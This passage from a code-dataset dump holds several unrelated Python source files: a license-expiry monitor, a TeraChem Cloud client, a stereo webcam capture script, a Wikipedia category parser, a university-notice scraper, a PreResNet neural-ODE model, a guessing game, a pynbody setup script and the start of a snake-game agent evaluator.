in monitor_settings.ini\r\n config.read('monitor_settings.ini')\r\n\r\n conn = sqlite3.connect('asset_database.db')\r\n\r\n cursor = conn.execute('SELECT ID, NAME, LICENSE, EXPIRES FROM ASSETS')\r\n\r\n #get todays date\r\n today = datetime.date.today()\r\n\r\n #str today day,month,year\r\n date_today = today.strftime(\"%m/%d/%Y\")\r\n\r\n #read in from monitor_settings.ini\r\n notify_1 = int(config['dates']['notify_me_in_days_01'])\r\n notify_2 = int(config['dates']['notify_me_in_days_02'])\r\n notify_3 = int(config['dates']['notify_me_in_days_03'])\r\n\r\n for row in cursor:\r\n '''\r\n row[0] return type: int -> ID\r\n row[1] return type: str -> NAME\r\n row[2] return type: str -> LICENSE\r\n row[3] return type: str -> EXPIRES\r\n '''\r\n day_diff = diff_dates(date_today, row[3])\r\n\r\n if day_diff == notify_1:\r\n logger.info('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_1, row[1], key_object.decrypt(row[2]), row[3]))\r\n\r\n return ('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND 
EXPIRES {}'.format(notify_1, row[1], key_object.decrypt(row[2]), row[3]))\r\n elif day_diff == notify_2:\r\n logger.info('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_2, row[1], key_object.decrypt(row[2]), row[3]))\r\n \r\n return ('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_2, row[1], key_object.decrypt(row[2]), row[3]))\r\n elif day_diff == notify_3:\r\n logger.info('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_3, row[1], key_object.decrypt(row[2]), row[3])) \r\n \r\n return ('WARNING {} DAYS FOR THE ASSET {} WITH THE LICENSE {} AND EXPIRES {}'.format(notify_3, row[1], key_object.decrypt(row[2]), row[3]))\r\n\r\nif __name__ == \"__main__\":\r\n #logger\r\n logger = get_logger()\r\n set_logger(logger)\r\n\r\n #configparser\r\n config = get_parser()\r\n\r\n #encryption\r\n key_object = get_encrypt()\r\n\r\n notify = get_sql_statement(config, key_object, logger)\r\n\r\n #smptp\r\n smtpState = get_smtp_state(config)\r\n \r\n if smtpState == \"TRUE\":\r\n smtpObj = get_smtp(config)\r\n message = set_smtp(notify, config)\r\n send_smtp(smtpObj, message, config)\r\n\r\n\r\n","sub_path":"raisensu_monitor.py","file_name":"raisensu_monitor.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
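The monitor's notification logic hinges on `diff_dates`; a quick standard-library check of that helper in isolation (function body copied from the script above):

```python
import datetime

def diff_dates(date_today, comp_date):
    a = datetime.datetime.strptime(date_today, '%m/%d/%Y')
    b = datetime.datetime.strptime(comp_date, '%m/%d/%Y')
    return abs(b - a).days

print(diff_dates('01/01/2021', '01/31/2021'))  # 30
print(diff_dates('01/31/2021', '01/01/2021'))  # 30 (abs makes it symmetric)
```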
+{"seq_id":"197597678","text":"from typing import Dict, List, Optional, Union\n\nfrom . import __version__\nfrom .config import settings\nfrom .http_client import _RequestsClient\nfrom .models import (\n AtomicInputOrList,\n FutureResult,\n FutureResultGroup,\n OptimizationInputOrList,\n)\n\n\nclass TCClient:\n \"\"\"Main client object to perform computations using TeraChem Cloud.\"\"\"\n\n def __init__(\n self,\n *,\n tccloud_username: Optional[str] = None,\n tccloud_password: Optional[str] = None,\n profile: Optional[str] = None,\n tccloud_domain: Optional[str] = None,\n ):\n \"\"\"\n Initialize a TCClient object.\n\n Parameters:\n tccloud_username: TeraChem Cloud username\n tccloud_password: TeraChem Cloud password\n profile: Authentication profile name\n tccloud_domain: Domain of TeraChem Cloud instance to connect to\n\n !!! Danger\n It is not recommended to pass your TeraChem Cloud username and password\n directly to a `TCClient`. Instead instantiate a client with no credentials\n `client = TCClient()` and then run `client.configure()` to securely set up\n your authentication credentials for TeraChem Cloud.\n \"\"\"\n self._client = _RequestsClient(\n tccloud_username=tccloud_username,\n tccloud_password=tccloud_password,\n profile=profile,\n tccloud_domain=tccloud_domain,\n )\n self._openapi_spec: Optional[Dict] = None\n\n def __repr__(self) -> str:\n return f\"{type(self).__name__}({self._client._tccloud_domain}, profile={self.profile})\"\n\n def _set_openapi_specification(self):\n \"\"\"Gets OpenAPI specification from TeraChem Cloud Server\"\"\"\n self._openapi_spec = self._client._request(\n \"get\", \"/openapi.json\", api_call=False\n )\n\n @property\n def version(self) -> str:\n \"\"\"Return tccloud version\"\"\"\n return __version__\n\n @property\n def profile(self) -> str:\n \"\"\"Profile being used for authentication with TeraChem Cloud.\n\n Returns:\n The name of the name of the credentials profile being used with\n the current client.\n\n NOTE: This is a note!\n \"\"\"\n return self._client._profile\n\n @property\n def supported_engines(self) -> List[str]:\n \"\"\"Compute engines currently supported by TeraChem Cloud.\n\n Returns:\n List of engines currently supported by TeraChem Cloud.\"\"\"\n if not self._openapi_spec:\n self._set_openapi_specification()\n try:\n assert self._openapi_spec is not None\n engines = self._openapi_spec[\"components\"][\"schemas\"][\"SupportedEngines\"][\n \"enum\"\n ]\n except IndexError:\n print(\"Cannot locate currently supported engines.\")\n engines = [\"\"]\n return engines\n\n @property\n def supported_procedures(self) -> List[str]:\n \"\"\"Compute procedures currently supported by TeraChem Cloud.\n\n Returns:\n List of procedures currently supported by TeraChem Cloud.\"\"\"\n if not self._openapi_spec:\n self._set_openapi_specification()\n try:\n assert self._openapi_spec is not None\n procedures = self._openapi_spec[\"components\"][\"schemas\"][\n \"SupportedProcedures\"\n ][\"enum\"]\n except IndexError:\n print(\"Cannot locate currently supported procedures.\")\n procedures = [\"\"]\n return procedures\n\n def hello_world(self, name: Optional[str] = None) -> str:\n \"\"\"A simple endpoint to check connectivity to TeraChem Cloud.\n\n Parameters:\n name: Your name\n\n Returns:\n A message from TeraChem Cloud if the client was able to successfully\n connect.\n \"\"\"\n return self._client.hello_world(name)\n\n def compute(\n self, input_data: AtomicInputOrList, engine: str, queue: Optional[str] = None\n ) -> Union[FutureResult, 
FutureResultGroup]:\n \"\"\"Submit a computation to TeraChem Cloud.\n\n Parameters:\n input_data: Defines the structure of the desired computation.\n engine: A string matching one of the `self.supported_engines`\n queue: The name of a private compute queue. If None, default queue is used\n\n Returns:\n Object providing access to a computation's eventual result. You can check a\n computation's status by runing `.status` on the `FutureResult` object or\n `.get()` to block and retrieve the computation's final result.\n \"\"\"\n if self.supported_engines is not None:\n assert (\n engine in self.supported_engines\n ), f\"Please use one of the following engines: {self.supported_engines}\"\n\n return self._client.compute(input_data, engine, queue)\n\n def compute_procedure(\n self,\n input_data: OptimizationInputOrList,\n procedure: str,\n queue: Optional[str] = None,\n ) -> Union[FutureResult, FutureResultGroup]:\n \"\"\"Submit a procedure computation to TeraChem Cloud\n\n Parameters:\n input_data: Defines the inputs for an optimization computation\n procedure: The name of the procedure, e.g., 'berny'\n queue: The name of a private compute queue. If None, default queue is used\n\n Returns:\n Object providing access to a computation's eventual result. You can check a\n computation's status by runing `.status` on the `FutureResult` object or\n `.get()` to block and retrieve the computation's final result.\n \"\"\"\n if self.supported_procedures is not None:\n assert (\n procedure in self.supported_procedures\n ), f\"Please use one of the following procedures: {self.supported_procedures}\"\n return self._client.compute_procedure(input_data, procedure, queue)\n\n def configure(\n self, profile: str = settings.tccloud_default_credentials_profile\n ) -> None:\n \"\"\"Configure profiles for authentication with TeraChem Cloud.\n\n Parameters:\n profile: Optional value to create a named profile for use with TeraChem\n Cloud. No value needs to be passed and most users will only have one\n login with TeraChem Cloud. TCClient will access the profile by\n default without a specific name being passed. Pass a value if you have\n multiple logins to TeraChem Cloud.\n Note:\n Configures `tccloud` to use the passed credentials automatically in the\n future. You will not need to run `.configure()` the next time you use the\n `tccloud`.\n\n \"\"\"\n print(\n f\"✅ If you don't get have an account please signup at: {settings.tccloud_domain}/signup\"\n )\n access_token, refresh_token = self._client._set_tokens_from_user_input()\n self._client.write_tokens_to_credentials_file(\n access_token, refresh_token, profile=profile\n )\n print(\n f\"'{profile}' profile configured! Username/password not required for future use of TCClient\"\n )\n","sub_path":"tccloud/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
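Following the docstrings above, typical client usage looks like the sketch below. This assumes the package exposes `TCClient` at the top level and requires a live TeraChem Cloud account, so the compute call is left commented; the engine name is only an example of a `supported_engines` entry:

```python
from tccloud import TCClient

client = TCClient()
# client.configure()               # one-time, interactive credential setup
print(client.supported_engines)    # which QC engines the server offers

# future = client.compute(atomic_input, engine="psi4")  # atomic_input: an AtomicInput you build
# result = future.get()                                 # blocks until the job finishes
```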
+{"seq_id":"169920913","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nvidL = cv2.VideoCapture(2)\r\nvidR = cv2.VideoCapture(0)\r\n# vidL.set(3,1280)\r\n# vidL.set(4,720)\r\n# vidR.set(3,1280)\r\n# vidR.set(4,720)\r\ndirectLeft=\"D:\\WORK\\python\\Image Processing\\Logitech\\Left\"\r\ndirectRight=\"D:\\WORK\\python\\Image Processing\\Logitech\\Right\"\r\n# window_width=1280\r\n# window_height=720\r\ni=0\r\n\r\n\r\nwhile (True):\r\n ret1, frameR = vidR.read()\r\n ret2, frameL = vidL.read()\r\n flipRV = cv2.flip(frameR, -1)\r\n cv2.imshow('frameRight',flipRV)\r\n cv2.imshow('frameLeft',frameL)\r\n if cv2.waitKey(1) & 0xFF == ord('s'):\r\n i+=1\r\n fileL=\"ImageL\"+str(i)+\".png\"\r\n fileR = \"ImageR\" + str(i) + \".png\"\r\n os.chdir(directLeft)\r\n cv2.imwrite(fileL,frameL)\r\n os.chdir(directRight)\r\n cv2.imwrite(fileR, flipRV)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\nvidR.release()\r\nvidL.release()\r\ncv2.destroyAllWindows()","sub_path":"Stereovision/captureimagefor testing.py","file_name":"captureimagefor testing.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"352561892","text":"import gzip\r\nimport json\r\nimport re\r\n\r\nfilepath = 'data/jawiki-country.json.gz'\r\n\r\n# イギリスに関する記事本文を返す\r\ndef read_Eng(filepath):\r\n with gzip.open(filepath, 'r') as r:\r\n for line in r:\r\n # 行のデータを読み込む\r\n data = json.loads(line)\r\n # イギリスに関する記事本文を出力する\r\n if data['title'] == 'イギリス':\r\n return data['text']\r\n\r\n# カテゴリの行か調べる\r\ndef is_category(s):\r\n return re.match(r'^\\[\\[Category:.+\\]\\]$',s)\r\n\r\ndef main():\r\n text = read_Eng(filepath).split('\\n')\r\n\r\n for line in text:\r\n if is_category(line):\r\n # カテゴリ名を抽出する\r\n ca = re.match(r'^\\[\\[Category:(.+)\\]\\]$',line)\r\n ca_name = ca.group(1).split('|')[0]\r\n print(ca_name)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"chap3/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"387063203","text":"from bs4 import BeautifulSoup as BS\nfrom selenium import webdriver\nimport urllib.request\nimport urllib.parse\nimport requests as rq\n\n# 몇 페이지를 크롤링할 것인지 입력한다. 4 pages.\nlastPage = 4\npageNum = 1\n\n# chromedriver 경로 : 같은 층에 있으므로 상대 ���로\npath = 'chromedriver.exe'\n\n\n\nwhile pageNum < lastPage+1:\n\n # url이 while 내에서 돌아야 하는 이유?\n # pageNum이 지속적으로 변하고 이를 반영해야 하기 때문이다.\n url = f'http://inform.chungbuk.ac.kr/bbs/bbs.php?db=notice&search=%C0%E5%C7%D0&searchKey=subject&category=&pgID=ID12415888101&page={pageNum}' \n\n\n\n##### 여기서부터 selenium 사용으로 크롬 드라이버 동작 #####\n driver = webdriver.Chrome(path)\n driver.get(url)\n soup = BS(driver.page_source, 'lxml')\n \n # 타이틀 정보만 수집한다.\n title_list = soup.select(\"#body_line > nobr > a > b\")\n\n # 날짜, 조회수 정보를 수집한다.\n date_view_list = soup.find_all(class_ = \"body_num\")\n\n # href 정보만 수집한다.\n href_list = soup.select(\"#body_line > nobr > a\")\n \n driver.quit()\n##### 여기까지 selenium 사용 및 필요 데이터 추출 완료 #####\n\n\n\n # 타이틀 정보 리스트를 파일로 추출\n file = open('jt_info_title.txt', 'a')\n for ti in title_list:\n file.write(ti.text + '\\n')\n file.close()\n\n # 날짜 정보 리스트를 파일로 추출\n idx = 0\n file = open('jt_info_date.txt', 'a')\n for li in date_view_list:\n if idx % 4 - 2 == 0:\n file.write(li.text + '\\n')\n idx += 1\n file.close()\n\n # 조회수 정보 리스트를 파일로 추출\n idx = 0\n file = open('jt_info_view.txt', 'a')\n for li in date_view_list:\n if idx % 4 - 3 == 0:\n file.write(li.text + '\\n')\n idx += 1\n file.close()\n \n # href 정보 리스트를 파일로 추출\n file = open('jt_info_href.txt', 'a')\n for hr in href_list:\n if 'href' in hr.attrs:\n file.write(\"https://inform.chungbuk.ac.kr\" + hr.attrs['href'] + '\\n')\n file.close()\n\n pageNum += 1 # 다음 페이지 데이터 추출\n","sub_path":"testpro1/Crawler_JT.py","file_name":"Crawler_JT.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"228166461","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport math\n\nimport numpy as np\nfrom copy import deepcopy\n\nclass PreBasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1,\\\n norm_layer = None, act_layer = None, param_norm=lambda x: x):\n super(PreBasicBlock, self).__init__()\n\n self.conv1 = param_norm(nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False))\n self.bn1 = norm_layer(planes)\n\n self.conv2 = param_norm(nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False))\n self.bn2 = norm_layer(planes)\n \n self.act = act_layer\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n param_norm(nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False))\n )\n\n def forward(self, x):\n out = self.conv1(self.act(self.bn1(x)))\n out = self.conv2(self.act(self.bn2(out)))\n out += self.shortcut(x)\n return out\n \n \n \nclass PreBasicBlock2(nn.Module):\n expansion = 1\n\n def __init__(self, dim, norm_layer = None, act_layer = None, param_norm=lambda x: x):\n super(PreBasicBlock2, self).__init__()\n in_planes = dim\n planes = dim\n stride = 1\n self.nfe = 0\n self.nbe = 0\n self.forward_t = list()\n self.backward_t = list()\n self.dt = list()\n self.conv1 = param_norm(nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False))\n # Replace BN to GN because BN doesn't work with our method normaly\n self.bn1 = norm_layer(planes)\n\n self.conv2 = param_norm(nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False))\n self.bn2 = norm_layer(planes)\n \n self.act = act_layer\n\n self.shortcut = nn.Sequential()\n\n def forward(self, t, x):\n self.nfe += 1\n if isinstance(x, tuple):\n x = x[0]\n out = self.bn1(x)\n out = self.act(out)\n out = self.conv1(out)\n \n out = self.bn2(x)\n out = self.act(out)\n out = self.conv2(out)\n \n return out\n\n \n\nclass PreResNet(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10, ODEBlock_=None,\\\n norm_layers_ = (None, None, None),\\\n param_norm_layers_=(lambda x: x, lambda x: x, lambda x: x),\n act_layers_ = (None, None),\\\n in_planes_ = 64):\n '''\n norm_layers_: tuple of normalization layers for (BasicBlock, BasicBlock2, bn1)\n act_layers_: tuple of activation layers for (BasicBlock, BasicBlock2)\n \n '''\n \n super(PreResNet, self).__init__()\n self.in_planes = in_planes_\n self.ODEBlock = ODEBlock_\n \n self.ODEBlocks = []\n\n self.n_layers = len(num_blocks)\n self.n_features_linear = in_planes_\n \n self.conv1 = param_norm_layers_[2](nn.Conv2d(3, in_planes_, kernel_size=3, stride=1, padding=1, bias=False))\n \n\n \n self.layer1_1, self.layer1_2 = self._make_layer(in_planes_, num_blocks[0], stride=1,\n norm_layers_=norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_=act_layers_)\n \n if self.n_layers >= 2:\n self.n_features_linear *= 2\n self.layer2_1, self.layer2_2 = self._make_layer(in_planes_*2, num_blocks[1], stride=2,\n norm_layers_ = norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_ = act_layers_)\n \n if self.n_layers >= 3:\n self.n_features_linear *= 2\n self.layer3_1, self.layer3_2 = self._make_layer(in_planes_*4, num_blocks[2], stride=2,\n norm_layers_=norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_=act_layers_)\n\n if self.n_layers >= 4:\n 
self.n_features_linear *= 2\n self.layer4_1, self.layer4_2 = self._make_layer(in_planes_*8, num_blocks[3], stride=2,\n norm_layers_=norm_layers_[:2],\n param_norm_layers_=param_norm_layers_[:2],\n act_layers_=act_layers_)\n \n self.bn1 = norm_layers_[2](self.n_features_linear * block.expansion)\n self.linear = nn.Linear(self.n_features_linear * block.expansion, num_classes)\n\n \n def _make_layer(self, planes, num_blocks, stride, norm_layers_, param_norm_layers_, act_layers_):\n '''\n num_blocks: tuple (num_ResBlocks, num_ODEBlocks)\n stride: stride of first conv layer in ResNet layer\n '''\n num_resblocks, num_odeblocks = num_blocks\n \n strides = [stride] + [1] * (num_resblocks + num_odeblocks - 1)\n layers_res = []\n layers_ode = []\n \n for stride in strides[:num_resblocks]:\n layers_res.append(PreBasicBlock(self.in_planes, planes, stride,\\\n norm_layer = norm_layers_[0],\\\n param_norm=param_norm_layers_[0],\\\n act_layer = act_layers_[0]))\n self.in_planes = planes * PreBasicBlock.expansion\n \n for stride in strides[num_resblocks:]:\n layers_ode.append(self.ODEBlock(PreBasicBlock2(self.in_planes,\\\n norm_layer = norm_layers_[1],\\\n param_norm=param_norm_layers_[1],\\\n act_layer = act_layers_[1])))\n \n self.ODEBlocks += layers_ode\n \n return nn.Sequential(*layers_res), nn.Sequential(*layers_ode)\n\n # self.forward_t = list()\n # self.backward_t = list()\n # self.dt = list()\n @property\n def nfe(self):\n return {idx: layer.nfe for idx, layer in enumerate(self.ODEBlocks)}\n\n @nfe.setter\n def nfe(self, value):\n for layer in self.ODEBlocks:\n layer.nfe = value\n\n @property\n def nbe(self):\n return {idx: layer.nbe for idx, layer in enumerate(self.ODEBlocks)}\n\n @nbe.setter\n def nbe(self, value):\n for layer in self.ODEBlocks:\n layer.nbe = value\n\n @property\n def forward_t(self):\n return {idx: np.mean(layer.forward_t) for idx, layer in enumerate(self.ODEBlocks)}\n\n @forward_t.setter\n def forward_t(self, value):\n for layer in self.ODEBlocks:\n layer.forward_t = deepcopy(value)\n\n @property\n def backward_t(self):\n return {idx: np.mean(layer.backward_t) for idx, layer in enumerate(self.ODEBlocks)}\n\n @backward_t.setter\n def backward_t(self, value):\n for layer in self.ODEBlocks:\n layer.backward_t = deepcopy(value)\n\n @property\n def dt(self):\n return {idx: layer.dt for idx, layer in enumerate(self.ODEBlocks)}\n\n @dt.setter\n def dt(self, value):\n for layer in self.ODEBlocks:\n layer.dt = deepcopy(value)\n\n @property\n def f_t(self):\n return {idx: layer.f_t for idx, layer in enumerate(self.ODEBlocks)}\n\n @property\n def z_t(self):\n return {idx: layer.z_t for idx, layer in enumerate(self.ODEBlocks)}\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.layer1_1(out)\n out = self.layer1_2(out)\n if self.n_layers >= 2:\n out = self.layer2_1(out)\n out = self.layer2_2(out)\n if self.n_layers >= 3:\n out = self.layer3_1(out)\n out = self.layer3_2(out)\n if self.n_layers >= 4:\n out = self.layer4_1(out)\n out = self.layer4_2(out)\n \n out = F.relu(self.bn1(out))\n \n out = F.avg_pool2d(out, out.shape[-1])\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\ndef PreResNet4(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(0, 1)]\n else:\n num_blocks = [(1, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n\n \ndef PreResNet6(ODEBlock, norm_layers, 
param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 1)]\n else:\n num_blocks = [(2, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes) \n\n \ndef PreResNet10(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 1), (1, 1)]\n else:\n num_blocks = [(2, 0), (2, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n\n \ndef PreResNet18(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 1), (1, 1), (1, 1), (1, 1)]\n else:\n num_blocks = [(2, 0), (2, 0), (2, 0), (2, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n\n \ndef PreResNet34(ODEBlock, norm_layers, param_norm_layers, act_layers, in_planes):\n if ODEBlock:\n num_blocks = [(1, 2), (1, 3), (1, 5), (1, 2)]\n else:\n num_blocks = [(3, 0), (4, 0), (6, 0), (3, 0)]\n return PreResNet(PreBasicBlock, num_blocks, ODEBlock_=ODEBlock,\\\n norm_layers_ = norm_layers, param_norm_layers_ = param_norm_layers, act_layers_ = act_layers, in_planes_ = in_planes)\n \n\ndef lr_schedule(lr, epoch):\n optim_factor = 0\n if epoch > 250:\n optim_factor = 2\n elif epoch > 150:\n optim_factor = 1\n\n return lr / math.pow(10, (optim_factor))\n","sub_path":"models/preresnet.py","file_name":"preresnet.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
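A quick check of the step-decay schedule defined at the bottom of the module (assuming the `models` package is importable from the project root):

```python
from models.preresnet import lr_schedule

for epoch in (1, 151, 251):
    # decay by 10x after epoch 150 and again after epoch 250
    print(epoch, lr_schedule(0.1, epoch))  # 0.1, 0.01, 0.001
```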
+{"seq_id":"581655136","text":"import random\r\nwhile True:\r\n num = random.randrange(1, 10)\r\n guesses = 0\r\n guess = input(\"Enter a number: \")\r\n if guess != \"exit\":\r\n while int(guess) != num:\r\n if int(guess) > num:\r\n print(\"Too high\")\r\n guesses += 1\r\n elif int(guess) < num:\r\n print(\"Too low\")\r\n guesses += 1\r\n guess = input(\"Enter a number: \")\r\n if guess == \"exit\":\r\n break\r\n if guess != \"exit\":\r\n guesses += 1\r\n print(\"Exactly Right. You took\", guesses, \"guesses\\n\")\r\n else:\r\n break\r\n","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"210347692","text":"import os\nfrom distutils.core import setup, Extension\nfrom distutils.sysconfig import get_python_lib\n\nimport numpy\nimport numpy.distutils.misc_util\n\ntry : \n import pkg_resources\n import cython\n # check that cython version is > 0.15\n if float(pkg_resources.get_distribution(\"cython\").version.partition(\".\")[2]) < 15 : \n raise ImportError\n from Cython.Distutils import build_ext\n build_cython = True\n cmdclass = {'build_ext': build_ext}\nexcept:\n build_cython = False\n cmdclass = {}\n\nimport distutils.command.build_py\n\ntry : \n cmdclass['build_py'] = distutils.command.build_py.build_py_2to3\nexcept AttributeError:\n cmdclass['build_py'] = distutils.command.build_py.build_py\n\n\next_modules = []\nlibraries=[ ]\nextra_compile_args = ['-ftree-vectorizer-verbose=1', '-ftree-vectorize',\n '-fno-omit-frame-pointer',\n '-funroll-loops',\n '-fprefetch-loop-arrays',\n '-fstrict-aliasing',\n '-std=c99',\n '-Wall',\n '-O0']\n\nextra_link_args = []\n\nincdir = numpy.distutils.misc_util.get_numpy_include_dirs()\nincdir.append('pynbody/pkdgrav2')\nincdir.append('pynbody/pkdgrav2/mdl2/null')\n\n#os.path.join(get_python_lib(plat_specific=1), 'numpy/core/include')\nkdmain = Extension('pynbody/kdmain',\n sources = ['pynbody/kdmain.c', 'pynbody/kd.c', \n 'pynbody/smooth.c'],\n include_dirs=incdir,\n undef_macros=['DEBUG'],\n libraries=libraries,\n extra_compile_args=extra_compile_args,\n extra_link_args=extra_link_args)\n\ngravity = Extension('pynbody/pkdgrav',\n sources = ['pynbody/gravity/pkdgravlink.c',\n 'pynbody/pkdgrav2/cl.c',\n 'pynbody/pkdgrav2/cosmo.c',\n 'pynbody/pkdgrav2/ewald.c',\n 'pynbody/pkdgrav2/fio.c',\n 'pynbody/pkdgrav2/grav2.c',\n 'pynbody/pkdgrav2/ilc.c',\n 'pynbody/pkdgrav2/ilp.c',\n 'pynbody/pkdgrav2/listcomp.c',\n 'pynbody/pkdgrav2/mdl2/null/mdl.c',\n 'pynbody/pkdgrav2/moments.c',\n 'pynbody/pkdgrav2/outtype.c',\n 'pynbody/pkdgrav2/pkd.c',\n 'pynbody/pkdgrav2/psd.c',\n 'pynbody/pkdgrav2/romberg.c',\n 'pynbody/pkdgrav2/smooth.c',\n 'pynbody/pkdgrav2/smoothfcn.c',\n 'pynbody/pkdgrav2/rbtree.c',\n 'pynbody/pkdgrav2/tree.c',\n 'pynbody/pkdgrav2/walk2.c'],\n include_dirs=incdir,\n undef_macros=['DEBUG','INSTRUMENT'],\n define_macros=[('HAVE_CONFIG_H',None),\n ('__USE_BSD',None)],\n libraries=libraries,\n extra_compile_args=extra_compile_args,\n extra_link_args=extra_link_args)\n\next_modules += [kdmain]\n#ext_modules += [gravity]\n\nif build_cython : \n gravity_omp = Extension('pynbody.grav_omp',\n sources = [\"pynbody/gravity/direct_omp.pyx\"],\n include_dirs=incdir,\n extra_compile_args=['-fopenmp'],\n extra_link_args=['-fopenmp'])\n chunkscan = Extension('pynbody.chunk.scan',\n sources=['pynbody/chunk/scan.pyx'],\n include_dirs=incdir)\n\nelse :\n gravity_omp = Extension('pynbody.grav_omp',\n sources = [\"pynbody/gravity/direct_omp.c\"],\n include_dirs=incdir,\n extra_compile_args=['-fopenmp'],\n extra_link_args=['-fopenmp'])\n chunkscan = Extension('pynbody.chunk.scan',\n sources=['pynbody/chunk/scan.c'],\n include_dirs=incdir)\n \next_modules += [gravity_omp, chunkscan]\n \n\n\ndist = setup(name = 'pynbody',\n author = 'The pynbody team',\n author_email = 'pynbody@googlegroups.com',\n version = '0.19alpha',\n description = 'Light-weight astronomical N-body/SPH analysis for python',\n url = 'https://code.google.com/p/pynbody/downloads/list',\n package_dir = {'pynbody/': ''},\n packages = ['pynbody', 'pynbody/analysis', 'pynbody/bc_modules', \n 'pynbody/plot', 'pynbody/gravity', 'pynbody/chunk' ],\n# treat weave .c files like data files 
since weave takes\n# care of their compilation for now\n# could make a separate extension for them in future\n package_data={'pynbody': ['default_config.ini', \n 'sph_image.c','sph_to_grid.c',\n 'sph_spectra.c'],\n 'pynbody/analysis': ['cmdlum.npz',\n 'ionfracs.npz',\n 'interpolate.c',\n 'interpolate3d.c',\n 'com.c',\n 'CAMB_WMAP7'],\n 'pynbody/plot': ['tollerud2008mw'],\n 'pynbody/gravity': ['direct.c']},\n ext_modules = ext_modules,\n cmdclass = cmdclass,\n classifiers = [\"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n \"Programming Language :: Python :: 2\",\n \"Topic :: Scientific/Engineering :: Astronomy\",\n \"Topic :: Scientific/Engineering :: Visualization\"]\n \n )\n\n#if dist.have_run.get('install'):\n# install = dist.get_command_obj('install')\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"29549484","text":"import numpy as np\n\nfrom agent.dqn.rl_agent import get_observations\nfrom agent.greedy.greedy_agent import greedy_snake, make_grid_map\nfrom agent.dqn.rl_agent import agent as dqn_snake\nfrom env.chooseenv import make\nfrom tabulate import tabulate\nimport argparse\n\n\ndef print_state(state, actions, step):\n state = np.array(state)\n state = np.squeeze(state, axis=2)\n print(f'----------------- STEP:{step} -----------------')\n print(f'state:\\n{state}')\n print(f'actions: {actions}\\n')\n\n\ndef get_actions(state, algo):\n\n actions = np.random.randint(4, size=1)\n\n # dqn\n if algo == 'dqn':\n agent_trained_index = [0] # todo\n obs = get_observations(state, agent_trained_index, obs_dim=18)\n actions[:] = dqn_snake.choose_action(obs)\n\n # greedy\n if algo == 'greedy':\n greedy_info = get_greedy_info(state)\n\n actions[:] = greedy_snake(greedy_info['state'],\n greedy_info['beans'],\n greedy_info['snakes'],\n greedy_info['width'],\n greedy_info['height'],\n greedy_info['ctrl_agent_index'])[:]\n\n return actions\n\ndef get_greedy_info(observation):\n obs = 